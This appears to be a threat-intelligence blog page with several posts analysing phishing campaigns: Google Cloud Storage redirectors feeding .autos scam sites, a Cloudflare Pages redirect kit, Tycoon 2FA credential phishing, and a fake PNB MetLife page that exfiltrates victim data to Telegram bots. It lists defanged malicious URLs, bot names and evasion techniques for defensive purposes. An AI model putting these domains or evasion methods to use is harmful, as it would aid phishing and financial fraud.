Ongoing Phishing Campaign Abusing Google Cloud Storage to Redirect Users to Multiple Scam Pages

March 14, 2026 Anurag GawandeLeave a comment

A few days ago, I published a blog analyzing a phishing campaign abusing Google Cloud infrastructure:

Analysis of an Integrated Phishing Campaign Utilizing Google Cloud Infrastructure

While continuing to monitor the infrastructure used in that campaign, I discovered several additional URLs hosted on Google Cloud Storage (storage[.]googleapis[.]com) that appear to be part of the same ecosystem. These pages act as intermediate redirectors, sending victims to a wide variety of phishing and scam sites hosted primarily on the .autos TLD.

What is interesting is that a single Google Cloud Storage page appears to function as a central redirect hub, distributing victims across multiple scam themes such as fake surveys, reward scams, antivirus alerts, job offers, and account storage warnings.

Newly Observed Google Cloud Storage URLs

The following URLs were identified during the investigation:

storage[.]googleapis[.]com/whilewait/successcomes.html
storage[.]googleapis[.]com/sndrr/strow.html
storage[.]googleapis[.]com/noonchi/noon.html
storage[.]googleapis[.]com/sndrr/hmd.html
storage[.]googleapis[.]com/wetaobao/taobao.html
storage[.]googleapis[.]com/savelinge/goforward.html
storage[.]googleapis[.]com/lithesome/stepupnow.html

One particular page stood out during analysis:

This page appears to function as a traffic distribution page, redirecting visitors to multiple phishing sites depending on campaign configuration.

storage[.]googleapis[.]com/whilewait/successcomes.html

I also shared an earlier observation on X (Twitter):

18 more phishing emails in just two days.

🔗 Sample URLs:

storage[.]googleapis[.]com/whilewait/successcomes.html
storage[.]googleapis[.]com/sndrr/strow.html
storage[.]googleapis[.]com/noonchi/noon.html
storage[.]googleapis[.]com/sndrr/hmd.html… https://t.co/Wsh5ahUiTu pic.twitter.com/5TuRjWogxt
— Anurag (@Malwarehunterr) February 27, 2026

Traffic Redirection to .autos Phishing Domains

The redirector page was observed sending users to various phishing domains, most of which are hosted under the .autos top-level domain.

These phishing sites are themed around different scams designed to lure victims into providing personal or financial information.

Below are the different campaign themes identified.

Netflix Reward Phishing Pages

Some pages impersonate Netflix reward programs, claiming users have won prizes or special promotions.

Domains involved:

digital-shift-us-bin[.]autos
searchonboardloadingrock[.]autos
mailanalyticsvolseries[.]autos
verifieddreamseriesultimate[.]autos
goldavgpenb[.]autos
alt-dig-gold-tab[.]autos
bio-easy-pe-loading[.]autos
analytics-mail-post-quite[.]autos
favouritebiochoicelife[.]autos

Additional domains were also shared by an X user @skocherhan quoting my earlier post:

#phishing

golddreamflyrock[.]autos
yeahf2fprtctrl[.]autos
smartdreambio[.]autos
kolloadingshiftanalytics[.]autos
analyticsprt[.]autos
voldel[.]autos
onboardnatf2fdirect[.]autos
tipsonboardvolnbllc[.]autos
moviefiz[.]autos
d3b7b967ea[.]treadwear[.]autos
movies-4u[.]autos… https://t.co/LcgfefVofd
— ܛܔܔܔܛܔܛܔܛ (@skocherhan) March 12, 2026

Additional domains observed:

goldavgpenb[.]autos
alt-dig-gold-tab[.]autos
bio-easy-pe-loading[.]autos
analytics-mail-post-quite[.]autos
favouritebiochoicelife[.]autos

These pages typically present users with messages claiming they have been selected for a Netflix reward or promotional giveaway, encouraging them to complete a short survey to claim their prize.

Like the other scams in this campaign, the pages ultimately attempt to collect personal or payment information, often under the pretext of paying a small shipping fee or verifying eligibility.

Fake Dell Laptop Giveaway Survey

Another variation promotes a Dell laptop giveaway, typically claiming that users can win a Dell 16 DC16250 laptop worth $699.99.

Domains hosting these pages include:

avgeasyposttips[.]autos
searchonboardloadingrock[.]autos
alt-dig-gold-tab[.]autos
gold-avg-pe-nb[.]autos
tra4fficjumpchoiceclever[.]autos
digprtdreamavg[.]autos
shifttra4fficcapsmatch[.]autos
digitalshiftusbin[.]autos
spacevertabnb[.]autos
rot-digital-fly-f2f[.]autos

These pages typically:

Ask the victim to answer a few survey questions.
Display a congratulatory message.
Request credit card details to pay for shipping fees.

Fake “AI Data Assistant – Earn $500/day” Job Lure

Another theme used in this campaign promotes a fake online job opportunity, claiming users can earn $500 per day as an AI data assistant.

Observed domains:

verifieddreamseriesultimate[.]autos
pushbuttonsystem[.]net
lifeverifiedfavouritever[.]autos
mailanalyticsvolseries[.]autos
spacevertabnb[.]autos

These pages typically claim:

No experience required
High daily earnings
Work from home opportunities

Users are often redirected through several steps designed to collect personal information or push affiliate offers.

“Antivirus Subscription Expired” Phishing Pages

Another set of pages impersonates security alerts, claiming the user’s antivirus subscription has expired.

Domains observed:

safepremiumfreeriskfree[.]autos
nationalrecommendsafesmart[.]autos
deviceriskfreesafe[.]autos
freespeedpopular[.]autos
guardpopularinstalldevice[.]autos
speeddeviceboostfast[.]autos
programeffectivespeedfast[.]autos

These pages typically:

Display fake security warnings
Urge users to renew antivirus protection
Redirect victims to payment or affiliate pages.

“Cloud Storage Full” Phishing Pages

Another variation of this campaign uses cloud storage warnings, claiming the user’s storage account is full.

Observed domains:

stairs-table-fire.autos
tablewordstairs[.]autos
ceilwordinteriorbowl[.]autos
safe-premium-free-riskfree[.]autos
nationalprotectsmartfree[.]autos
guardpopularinstalldevice[.]autos
ceil-word-interior-bowl[.]autos
free-speed-popular-guard[.]autos
device-safe-clean-boost[.]autos
boost-premium-recommend-effective[.]autos
trk[.]independent-teacher-strength-nails[.]run

Additional domains were also shared by an X user quoting my earlier post:

#Phishing

accurate-cyber-proactive-defense[.]autos
accurate-guard-optimized-shield[.]autos
accurate-safe-reliable-defense[.]autos
accurate-safe-smart-defense[.]autos
accurate-smart-authorized-efficient[.]autos
accurate-smart-safe-advanced[.]autos… https://t.co/qIXObR7gLy
— ܛܔܔܔܛܔܛܔܛ (@skocherhan) March 12, 2026

These pages often mimic services such as:

Google Drive
iCloud

The goal is to scare victims into clicking through fake upgrade or security alerts.

Fake Walmart Survey Scam

Several phishing domains impersonate Walmart survey reward campaigns, often promising a free gift or prize in exchange for completing a short survey.

Domains observed:

jumpdiganalyticsprt[.]autos
avgeasyposttips[.]autos
cleververifieddigitalmatch[.]autos
altbio[.]autos
alt-dig-gold-tab[.]autos
matchstarsrotchoice[.]autos
directvolcapsus[.]autos
digprtdreamavg[.]autos

These pages typically display messages such as:

“Congratulations! You have been selected to receive a reward”
“Complete a short Walmart survey to claim your prize”

After the survey is completed, victims are usually asked to pay a small shipping fee, where credit card information is harvested.

Key Observation

One of the most notable aspects of this campaign is the central role of the Google Cloud Storage page:

storage[.]googleapis[.]com/whilewait/successcomes.html

During testing, this page was observed redirecting users to multiple phishing domains across different scam themes.

This suggests it is functioning as a traffic distribution or redirect infrastructure, allowing attackers to rotate phishing destinations while keeping the initial delivery URL stable.

Using Google Cloud Storage also adds a layer of trust, as the domain belongs to a legitimate cloud provider.

Another interesting observation is that a single .autos domain can serve multiple phishing page themes after redirection from the Google Cloud Storage page. Depending on the redirection path or parameters, the same domain may host different scams such as:

Fake surveys
Reward scams
Storage full alerts
Antivirus subscription warnings
Job offer lures

This behavior indicates that the attackers are likely using a shared phishing kit or centralized backend infrastructure, allowing them to quickly rotate scam themes while reusing the same domains.

Another observation is the high volume of phishing emails currently being distributed using this infrastructure. Over the past few days, I have been receiving around 40–50 phishing emails within a 24-hour period, many of which contain links to Google Cloud Storage pages that act as redirectors to the phishing ecosystem described in this report.

URLs repeatedly observed in these emails include:

storage[.]googleapis[.]com/whilewait/successcomes.html
storage[.]googleapis[.]com/savelinge/goforward.html

Indicators of Compromise (IOCs)

Google Cloud URLs

storage[.]googleapis[.]com/whilewait/successcomes.html
storage[.]googleapis[.]com/sndrr/strow.html
storage[.]googleapis[.]com/noonchi/noon.html
storage[.]googleapis[.]com/sndrr/hmd.html
storage[.]googleapis[.]com/wetaobao/taobao.html
storage[.]googleapis[.]com/savelinge/goforward.html
storage[.]googleapis[.]com/lithesome/stepupnow.html

Phishing Domains

digital-shift-us-bin[.]autos
searchonboardloadingrock[.]autos
mailanalyticsvolseries[.]autos
verifieddreamseriesultimate[.]autos
goldavgpenb[.]autos
alt-dig-gold-tab[.]autos
bio-easy-pe-loading[.]autos
analytics-mail-post-quite[.]autos
favouritebiochoicelife[.]autos
goldavgpenb[.]autos
alt-dig-gold-tab[.]autos
bio-easy-pe-loading[.]autos
analytics-mail-post-quite[.]autos
favouritebiochoicelife[.]autos
avgeasyposttips[.]autos
searchonboardloadingrock[.]autos
alt-dig-gold-tab[.]autos
gold-avg-pe-nb[.]autos
tra4fficjumpchoiceclever[.]autos
digprtdreamavg[.]autos
shifttra4fficcapsmatch[.]autos
digitalshiftusbin[.]autos
spacevertabnb[.]autos
rot-digital-fly-f2f[.]autos
verifieddreamseriesultimate[.]autos
pushbuttonsystem[.]net
lifeverifiedfavouritever[.]autos
mailanalyticsvolseries[.]autos
spacevertabnb[.]autos
safepremiumfreeriskfree[.]autos
nationalrecommendsafesmart[.]autos
deviceriskfreesafe[.]autos
freespeedpopular[.]autos
guardpopularinstalldevice[.]autos
speeddeviceboostfast[.]autos
programeffectivespeedfast[.]autos
stairs-table-fire.autos
tablewordstairs[.]autos
ceilwordinteriorbowl[.]autos
safe-premium-free-riskfree[.]autos
nationalprotectsmartfree[.]autos
guardpopularinstalldevice[.]autos
ceil-word-interior-bowl[.]autos
free-speed-popular-guard[.]autos
device-safe-clean-boost[.]autos
boost-premium-recommend-effective[.]autos
trk[.]independent-teacher-strength-nails[.]run
jumpdiganalyticsprt[.]autos
avgeasyposttips[.]autos
cleververifieddigitalmatch[.]autos
altbio[.]autos
alt-dig-gold-tab[.]autos
matchstarsrotchoice[.]autos
directvolcapsus[.]autos
digprtdreamavg[.]autos

This campaign demonstrates how attackers continue to abuse trusted cloud infrastructure such as Google Cloud Storage to host redirectors that distribute victims to multiple phishing pages.

By using legitimate cloud services as part of the attack chain, threat actors can increase credibility and reduce the likelihood of immediate blocking.

The use of large numbers of disposable .autos domains further allows attackers to rotate phishing pages frequently while keeping the delivery infrastructure intact.

In addition, the system appears to restrict repeated access attempts from the same IP address. After a user successfully reaches a phishing page through the redirector, subsequent attempts to access similar URLs from the same IP may result in the page failing to load or redirecting to unrelated sites. This behavior suggests the presence of IP-based filtering or traffic distribution logic, commonly used in malicious traffic distribution systems (TDS) to control how often a visitor can access the phishing infrastructure.

Analysis of an Integrated Phishing Campaign Utilizing Google Cloud Infrastructure

March 3, 2026 Anurag Gawande21 Comments

In recent weeks, a highly organized phishing campaign has surfaced, characterized by its use of legitimate Google infrastructure to bypass standard security filters. I have identified more than 25 distinct phishing emails targeting a single account, all of which ultimately direct users to a specific URL:

hxxps://storage[.]googleapis[.]com/whilewait/comessuccess.html

Understanding the Technical Infrastructure

The URL in question is hosted on Google Cloud Storage (GCS). To the average user or basic email security gateway, the domain googleapis.com appears trustworthy because it is a legitimate Google-owned domain used for hosting cloud assets.

In this specific exploit:

The Bucket: whilewait is a unique storage container created by the attacker within a Google Cloud project.
The Payload: comessuccess.html is a script-heavy file designed to act as a “gatekeeper” or “redirector“.

By hosting the initial link on Google’s servers, the attackers ensure the email passes authentication checks like SPF and DKIM. Once a user clicks, the HTML file on Google’s server silently redirects the browser to a third-party malicious site, often used for credit card harvesting or malware distribution.

Diversity of Social Engineering Tactics

More than 25 emails captured in this study demonstrate an exhaustive range of “hooks” designed to appeal to different psychological triggers. While the underlying technical path is identical, the presentation varies wildly:

Account Urgency: Notifications claiming “Cloud Storage Full” or “Google Account Storage Full“.
Security Fears: Alerts regarding a “Critical Threat Detected” or “Antivirus Protection Expired“.
Retail Incentives: Reward offers from brands such as Lowe’s, T-Mobile, and State Farm.
Lifestyle & Health: Promotions for “Homemade Recipes“, “Harry & David Gift Baskets“, “Blood Sugar Watch” or “Neuropathy Pain” solutions.

Despite these different themes, the goal remains consistent, drive traffic to the whilewait storage bucket to initiate a fraudulent transaction or steal sensitive information.

The Final Objective: Credit Card Harvesting

Following the redirect from the Google Cloud link, users are typically presented with a “shipping fee” or “service charge” for their reward or security update. This is the Credit Card (CC) Harvesting phase. Any payment information entered on these secondary sites is captured by the attackers, leading to immediate financial fraud. This specific lure mirrors the tactics identified in recent threat research (link given below), where scareware emails are increasingly used to push users toward these fraudulent “subscription” or “service” portals.

How Scareware Emails Now Push Legitimate Subscriptions

Professional Recommendations for Mitigation

To defend against this specific style of “Trusted-Platform Phishing“, the following steps are recommended:

Inspect the Redirect Path: Be aware that a link starting with storage.googleapis.com is not an official communication from Google, it is a file hosted by a third party using Google’s tools.
Verify Sender Metadata: Even if the link looks legitimate, the “From” address in these 25 plus samples often consists of unrelated, randomized alphanumeric strings.
Submit Infrastructure Abuse Reports: These campaigns rely on the longevity of the storage bucket. Reporting the whilewait bucket to the Google Cloud Abuse Team is the most effective way to dismantle the entire 25 plus email network at once.

Cloudflare Pages “Continue Read” Redirect Kit Abused for Phishing, Adware, and Malware Delivery

February 15, 2026 Anurag Gawande1 Comment

I identified a long-running redirect infrastructure abusing Cloudflare Pages (pages.dev) to host benign-looking SEO articles (for example, celebrity “net worth” blogs or gaming help content) that display a forced “Continue reading / Continue Read” pop-up shortly after page load.

Once the user clicks the button, the browser is redirected into downstream infrastructure that may lead to:

Credential-harvesting phishing pages
Adware / PUP installers
Trojan or malware droppers
Fake browser download lures (observed: Opera-themed “diagnostics” funnel)
QR-code / fake CAPTCHA social-engineering pages

More than 250 URLs were observed using the same visual template and behavior, and historical evidence from URLScan shows activity persisting for 5 months, suggesting deliberate reputation building and SEO indexing.

Initial Infection Vector: Benign SEO Content on Cloudflare Pages

The landing pages appear as normal blog articles but automatically display a modal message:

“Continue reading by clicking the button below.”

This design ensures the redirect is user-initiated, helping bypass automated scanners and reputation systems.

Common characteristics

Hosted on: *.pages.dev
SEO-style article content
Modal overlay appears a few seconds after page load
Redirect only occurs after button click

Scale, Persistence, and Search Engine Exposure

Across the analyzed samples, more than 250 distinct URLs were identified showing identical UI and UX behavior, indicating the use of the same phishing template or kit deployed across different article topics. The activity has remained visible for approximately five months based on URLScan observations, suggesting persistence rather than short-lived campaigns. Additionally, some of these pages have been indexed in Google search results, significantly increasing the likelihood of exposure to real users and amplifying the overall risk posed by the operation.

Redirect Logic (Click-Gated Pre-Lander Behavior)

The redirect mechanism is implemented using delayed modal display and a click-triggered JavaScript redirect.

Key Observation

Across many different pages, most samples use the same redirect destination inside window.open()

This is important because it shows that the pages.dev sites are probably not standalone phishing pages created one by one. Instead, they appear to work more like traffic pre-landers that quietly direct visitors to a shared backend system. The key= parameter in the URL also looks intentional rather than random, and it is likely being used for tracking or routing within the campaign, possibly as a campaign ID, an affiliate tracking token, or even a value used to classify or group potential victims.

In short:

Multiple benign-looking SEO pages are acting as entry points into a centralized redirect infrastructure.

Central Redirector Role in the Infection Chain

The shared redirect endpoint:

hxxps://preservationwristwilling[.]com/utx3iw6i?key=<token>

likely serves as a Traffic Distribution System (TDS) decision node, responsible for:

Geo/IP filtering
Proxy/VPN detection
User-agent validation
Campaign routing
Conditional payload delivery

Simplified Kill Chain

Anti-Analysis Behavior: Proxy / VPN Detection

During testing, downstream pages performed VPN/Proxy checks.

If anonymity was detected, the page displayed:

“Anonymous Proxy detected.”

and stopped further redirection.

Security Impact

From a security perspective, this behavior is particularly concerning because it makes deeper analysis much harder. By blocking or redirecting automated environments, it can prevent sandboxes and researchers from ever reaching the real payload, which in turn leads to very low antivirus detection rates. As a result, automated scans may incorrectly appear clean, creating a false sense of safety even though malicious activity may still be present behind the scenes.

Observed Downstream Outcomes

1) Fake File Download Funnel – S3 ZIP Payload

One redirect path showed a “Your File Download Is Ready” page, leading to:

Intermediate download host (e.g., loaditfile[.]com)
Final payload stored on Amazon S3 (SetupFile-xxxx.zip)

2) Fake Browser Diagnostics – Opera Download Lure

Another branch displayed a fake compatibility/diagnostics score (e.g., 40/100) urging users to:

“Download Opera Browser”

This pattern feels very similar to the affiliate-driven browser installation funnels often seen in malvertising campaigns, where traffic is quietly redirected through multiple steps before reaching the final payload or monetization stage.

3) QR Code / Fake CAPTCHA Social Engineering

Some redirects presented:

“Prove you are not a robot”
QR code requiring mobile scan

Flows like this are commonly designed to move victims step by step toward the attacker’s real objective. In many cases, the final destination can be a phishing page that steals credentials, a subscription fraud scheme that silently charges the user, or even the delivery of mobile malware disguised as a legitimate download.

Payload Example and Low Detection Context

One observed executable sample (adware/PUP classification):

SHA256: be590100ecdcae5ce4b7b42f87082e201fcb2f38c114c8fbc6640ad9b9a0708a

VirusTotal showed detection

What makes this particularly notable is that the overall setup closely matches how modern malvertising Traffic Distribution Systems (TDS) typically operate. The infrastructure shows several familiar patterns, such as abusing a trusted hosting platform like Cloudflare Pages, allowing pages to be indexed by search engines to attract organic traffic, and using click-gated redirects to evade automated analysis. Behind the scenes, everything appears to funnel through a centralized redirect endpoint where the final payload can be delivered conditionally, depending on the visitor. This kind of design also supports multiple monetization paths rather than a single outcome. Taken together, it suggests we are not looking at just one phishing kit, but a broader shared redirect ecosystem designed to distribute traffic at scale.

Indicators of Compromise (IOCs)

Domain

preservationwristwilling[.]com
Path: /utx3iw6i
Query Parameter: key=<token>
loaditfile[.]com

Malicious Sample

be590100ecdcae5ce4b7b42f87082e201fcb2f38c114c8fbc6640ad9b9a0708a
Windows Executable
Classification: Adware/PUP
VirusTotal Detection

Network Indicator

preservationwristwilling[.]com/utx3iw6i?key=

URLScan.io search result

This campaign highlights how attackers carefully blend several techniques to stay under the radar and keep their operation running for long periods. By abusing legitimate hosting services, leveraging SEO poisoning to attract real users, using click-triggered redirects to avoid automated detection, and routing visitors through a centralized traffic system, they create a stealthy and resilient infrastructure capable of quietly delivering malware or other malicious outcomes over time

Tycoon 2FA Campaign Abusing *.contractors Domains for Gmail and Microsoft 365 Credential Harvesting

January 29, 2026January 29, 2026 Anurag GawandeLeave a comment

Overview

Over the past few weeks, I have been tracking a credential harvesting campaign that repeatedly abuses newly registered *.contractors domains to deliver Gmail and Microsoft 365/Outlook phishing pages.

While the social engineering lures vary including ICANN email verification, document sharing, and account security prompts. The underlying infrastructure, tooling, and execution flow remain consistent

Based on analysis of the phishing HTML, JavaScript, and runtime behavior, this activity can be attributed with high confidence to the Tycoon 2FA phishing kit, based on its distinctive MFA aware execution flow, client side obfuscation, and anti-analysis tradecraft.

This attribution is supported by distinctive Tycoon specific client side tradecraft, including MFA aware flows, advanced anti-analysis logic, and encrypted runtime loaders, as shown below.

Technical Evidence Supporting Tycoon 2FA Attribution

Analysis of the extracted HTML and JavaScript reveals multiple Tycoon 2FA specific behaviors that go beyond generic phishing kits.

Anti-Analysis & Sandbox Evasion Logic

The phishing pages actively detect analysis environments and developer tools, immediately terminating execution or redirecting the user if detected:

Additional protections disable common inspection techniques:

This multi-layered anti-analysis logic is a well known characteristic of Tycoon 2FA deployments, commonly observed across multiple campaigns leveraging this phishing-as-a-service (PhaaS) framework.

Runtime Debugger Detection & Forced Redirect

The kit also employs debugger timing detection to identify active inspection and force redirection:

This technique is specifically used by Tycoon based phishing frameworks to evade dynamic analysis and sandbox detonation.

ICANN Email Verification Lure

One of the more recent samples impersonates ICANN (Internet Corporation for Assigned Names and Numbers) and claims that the recipient’s email address must be verified to avoid domain-related disruption.

The email states that:

The recipient’s email is listed as the owner contact for a domain
The address is allegedly unverified or inactive
Failure to verify may result in email suspension

A verification link is provided, styled to appear ICANN-related. However, hovering over the link reveals that it actually points to attacker controlled infrastructure hosted outside of any legitimate ICANN or registrar domain. In this case, the observed link resolved to

hxxps://recontact252.bluvias.de/572pectoral/$anurag@malwr-analysis.com

The URL embeds the recipient’s email address directly in the path, a common personalization technique used in targeted phishing campaigns to increase credibility and successful credential submission.

Redirection Flow: CAPTCHA as an Anti-Analysis Gate

Clicking the verification link does not immediately present a login page.

Instead, victims are routed through a fake CAPTCHA / “confirm you’re human” page, which serves as a deliberate execution delay.

This delay is important for two reasons:

Automated sandbox services (e.g., URLScan) often complete scanning before the CAPTCHA stage is reached, meaning the actual phishing payload is never rendered during automated analysis.
User interaction is required to proceed, filtering out non-human traffic and reducing detection rates.

Final Payload: Gmail & Microsoft 365 Tycoon 2FA Lures

After CAPTCHA completion, victims are redirected to high-fidelity Gmail or Microsoft 365 / Outlook login pages, depending on the campaign variant.

Observed behaviors include:

Accurate UI and branding replication
Email address prefilled or dynamically referenced
Transition into multi-step authentication flows
MFA approval interception and credential capture

Despite branding differences, both lures share identical loader logic, obfuscation patterns, and runtime behavior, confirming they are part of the same Tycoon 2FA campaign.

Infrastructure Reuse: *.contractors Domains

Across all observed samples, the campaign consistently abuses freshly registered .contractors domains, often using randomized subdomains and long URL paths.

Examples observed include:

Outlook 

hxxps://datacenter.lonaihoo.contractors/i!2zDbFPEvdm/

hxxps://pytorch.hithomu.contractors/Hik3GWNtRtmoaf@Ul5FNuB3/$bmVzZS5ndW5lckBlZ29uemVobmRlci5jb20=

hxxps://bigbluebutton.seacrevea.contractors/nGPI9ensbX@Y/

hxxps://redoc.kaidaisoo.contractors/Yi@9yUWrVO/

hxxps://firewall.tiostemio.contractors/nu2ATGWco@GZ/

hxxps://pulumi.kaidaisoo.contractors/QBQG4CC@30W/

Gmail 

hxxps://cdnedge.kirosoo.contractors/UyHX5Z5NJWj!i6VTZW5/

hxxps://bscscan.kirosoo.contractors/KQccgiv0@RRZ4xeCQMfRJbnT/

hxxps://copytrade.kirosoo.contractors/m8WqmrYb6lVk7C@9o1Yio/

hxxps://dist.draidatroo.contractors/4!OMtEFiKRQ/

hxxps://boot.lizojea.contractors

hxxps://hashid.draidatroo.contractors/ey!z5jV2w/

Benign Page

hxxps://ide.pishathi.contractors

hxxps://ide.niramio.contractors/

hxxps://js.hithomu.contractors/

hxxps://substack.wifupu.contractors/

hxxps://swap.lizojea.contractors/

hxxps://bandwidth.kioboumu.contractors/tO3v!7gw

hxxps://zip.lucadru.contractors/

Common characteristics observed across these campaigns include domains registered very recently, most notably on 07 January 2026 and 14 January 2026 along with randomized URL paths and identifiers designed to evade detection. Victim email addresses are embedded directly within the URLs to personalize lures and enable tracking.

Observed Evasion via Decoy Landing Pages

When analysis is detected or when execution fails, the infrastructure does not return an error page.

Instead, victims or scanners are redirected to to benign decoy landing page templates, including:

Finquick
Flowguide
Desio Copilot

These templates act as decoy content, helping:

Evade automated detection
Reduce suspicion during manual review
Prolong domain lifespan

This fallback behavior has been repeatedly observed in Tycoon-based phishing campaigns.

Campaign Scope: *.contractors Domains Observed on URLScan

During this investigation, I identified multiple .contractors domains associated with this campaign through URLScan submissions and pivoting.

A consolidated list of all observed .contractors domains, along with scan links and timestamps, will be provided below for reference and detection purposes.

https://urlscan.io/result/019c0245-d376-75f6-9cb1-61ea3d390d5b/

https://urlscan.io/result/019c03c8-00f8-718f-b45a-af4fd080112e/

https://urlscan.io/result/019c046b-012c-740e-b96a-cf111e169b0a/

https://urlscan.io/result/019bc8b1-63f4-765c-96a1-46d406426c1e/

https://urlscan.io/result/019bfa8b-127e-7718-abad-b1390d3c9e08/

https://urlscan.io/result/019bec78-0eaf-70c9-bbda-d839444f8120/

https://urlscan.io/result/019bfeea-9343-713f-8cf8-cd62c3f10a01

https://urlscan.io/result/019bd770-5232-7789-807b-127ca1422e2b

https://urlscan.io/result/019c0616-3df5-7178-a87a-f80358df27b0/

This activity represents a coordinated, MFA aware phishing campaign, not isolated incidents.

While this analysis identifies multiple .contractors domains and consistent infrastructure patterns, it is likely that additional domains and variants are in use beyond those documented here. The findings in this post are based on artifacts and infrastructure observed within the scope of URLScan, and the full extent of the campaign may be broader.

Additional Infrastructure Observed

During continued investigation, I identified additional, distinct domains serving the same Microsoft 365 / Outlook Tycoon 2FA lure, indicating broader infrastructure reuse beyond the initially observed .contractors clusters.

These domains exhibit the same execution flow, CAPTCHA gating, MFA-aware login sequence, and post-authentication behavior, confirming they are part of the same phishing operation, rather than unrelated or opportunistic reuse.

URLScan.io hash search

Note on Campaign Scale

The domains and infrastructure documented above represent only a subset of the total activity observed during this investigation. While many additional domains and variants were identified, listing all of them would significantly expand the scope of this post.

For the purposes of this write-up, I will leave the analysis here, focusing on representative samples that clearly demonstrate the campaign’s tradecraft and attribution.

Fake “PNB MetLife Payment Gateway” Page Stealing Customer Details and Redirecting Victims to UPI Payments

January 21, 2026 Anurag Gawande6 Comments

Overview

While actively hunting for phishing site, I came across multiple web pages impersonating PNB MetLife Insurance and presenting themselves as official policy premium payment gateways. This activity highlights how scammers deliberately target reputed and widely trusted brands to exploit existing customer trust and increase the likelihood of successful financial fraud. Although the pages claim to offer legitimate premium payment and policy servicing options, analysis of the underlying HTML and JavaScript shows that no real payment processing or backend validation is involved at any stage.

The pages are optimized for mobile devices, both in layout and interaction design. This strongly suggests that victims are likely being lured via SMS messages, although delivery via email, social media platforms, or messaging apps cannot be ruled out.

Fake PNB MetLife Payment Gateway – Initial Landing Page

The first template presents a mobile-friendly page branded as “PNB MetLife Payment Gateway”. It immediately prompts users to enter their name, policy number and mobile number, claiming these details are required to proceed with premium payment.

What is immediately noticeable is that the page does not validate any of the entered information. Any arbitrary values are accepted, and the user is allowed to proceed to the next step without verification.

hxxps://pnb-metlife-g-shiv-1aad8zgyup.edgeone.app/

Stealthy Data Exfiltration via Telegram Bots

Once the user submits the first form, the entered details are silently exfiltrated using the Telegram Bot API. Instead of communicating with a legitimate payment backend, the page sends captured information directly to Telegram, where it can be monitored in real time by the attacker.

The stolen data includes the victim’s name, policy number, and mobile number. Hardcoded Telegram bot tokens and chat IDs are embedded directly in the page’s JavaScript, leaving no ambiguity about the intent of the page.

During investigation, multiple Telegram bots and operator accounts were observed across related samples. Bots such as pnbmetlifesbot and goldenxspy_bot are used to collect victim data, while operator accounts including darkdevil_pnb and prabhatspy appear to receive and monitor these submissions.

Payment Amount Collection and Transition to UPI Flow

After the initial data theft, victims are taken to a second page asking them to enter the payment amount. Again, there is no backend validation or policy lookup. Any amount can be entered, and once submitted, this value is also sent to Telegram.

Immediately after this step, the page transitions into a UPI-based payment flow. The form disappears, and the victim is shown a QR code along with a countdown timer, creating urgency and psychological pressure.

QR Code Based UPI Payment Redirection

Once the victim submits the payment amount, the page dynamically switches to a QR based UPI payment flow. At this stage, no real payment gateway is involved. Instead, the JavaScript generates a UPI payment URI, renders it as a QR code, and pushes the victim toward completing the transaction inside a legitimate UPI app.

The following JavaScript snippet, extracted from the page, shows how the attacker generates the UPI QR code on the client side:

This code constructs a upi://pay URI and renders it as a QR code directly in the browser. Notably, the amount parameter is omitted or set to zero, forcing the victim to manually enter the amount in their UPI app.

Clipboard Abuse and Forced App Redirection

In addition to QR based payments, the page also includes direct buttons for PhonePe and Paytm. Clicking these buttons triggers JavaScript that silently copies the attacker controlled UPI ID to the clipboard and then redirects the victim to a payment app deep link.

The following snippet highlights this behavior:

This technique ensures that even if the victim does not scan the QR code, the UPI ID is already copied and ready to be pasted inside the payment app. Redirecting users into real UPI applications significantly lowers suspicion and increases the likelihood of successful fraud.

Second Phishing Template – Premium Update and Bank/Card Harvesting

In addition to the basic payment-only template, a more advanced variant was also observed. This second template follows a slightly different flow and is significantly more dangerous, as it escalates from payment fraud to full banking and card data theft.

The landing page again impersonates PNB MetLife and asks for name, policy number, and mobile number. After this, the victim is presented with multiple options such as Update Amount, Refund Your Amount, and Add AutoDebit System, creating the illusion of legitimate policy servicing.

hxxps://pnb-metlife-web-india-2025-pvt-xi0ogr8l7-2fhp3fxm5e.edgeone.app/

When the victim selects “Update Amount,” they are taken to a page prompting them to enter a new premium amount. After submitting the amount, the page displays a confirmation screen showing the entered policy number and amount, along with a button labeled “Complete Update.”

Bank and Card Details Harvesting

The next stage is where the attack becomes significantly more severe. The victim is presented with a Bank Details for Verification page.

The page claims this information is required for secure verification. Once submitted, all entered banking and card details are exfiltrated to Telegram using the goldenxspy_bot, with the data delivered to the Telegram user prabhatspy.

This confirms that the second template is not just payment fraud but a full scale financial credential harvesting operation.

Abuse of Free Hosting Platforms

Multiple variants of these phishing templates were observed hosted on EdgeOne Pages, which provides free hosting. This allows attackers to deploy and rotate phishing pages rapidly with minimal effort.

Across different deployments, the visual structure and JavaScript logic remain largely the same, while UPI IDs, mobile numbers, and Telegram bots change.

URLScan analysis shows multiple deployments of the same phishing kit, with identical client-side JavaScript logic and minor configuration changes such as UPI IDs, Telegram bots, and subdomain names.

https://urlscan.io/result/019bdbf6-dc98-7159-8a8b-45f4d97fe002/

https://urlscan.io/result/019bdabf-41f2-7613-81c0-1e99f27b3557/

https://urlscan.io/result/019bd9b5-431e-75b1-836b-ee5d50faaff0/

https://urlscan.io/result/019bd953-decb-72ae-aa3c-0693fdeac605/

https://urlscan.io/result/019bd950-f84f-718c-8b5e-b04f152e8898/

https://urlscan.io/result/019bd94d-3881-75ac-87ef-db3a317c8ff9/

https://urlscan.io/result/019bd5bb-d242-72bf-9f2f-52d5cab3894c/

https://urlscan.io/result/019b20cf-96e3-734b-bdb8-ef9aed13d27d/

https://urlscan.io/result/019b20cd-704f-763e-b7a7-67bccda9bda7/

User Advisory

Awareness and verification remain the most effective defenses against payment based phishing and fraud.

Malware Analysis, Phishing, and Email Scams

Cybersecurity Blog

Tag: CyberSecurity

Cloudflare Pages “Continue Read” Redirect Kit Abused for Phishing, Adware, and Malware Delivery

Tycoon 2FA Campaign Abusing *.contractors Domains for Gmail and Microsoft 365 Credential Harvesting

Fake “PNB MetLife Payment Gateway” Page Stealing Customer Details and Redirecting Victims to UPI Payments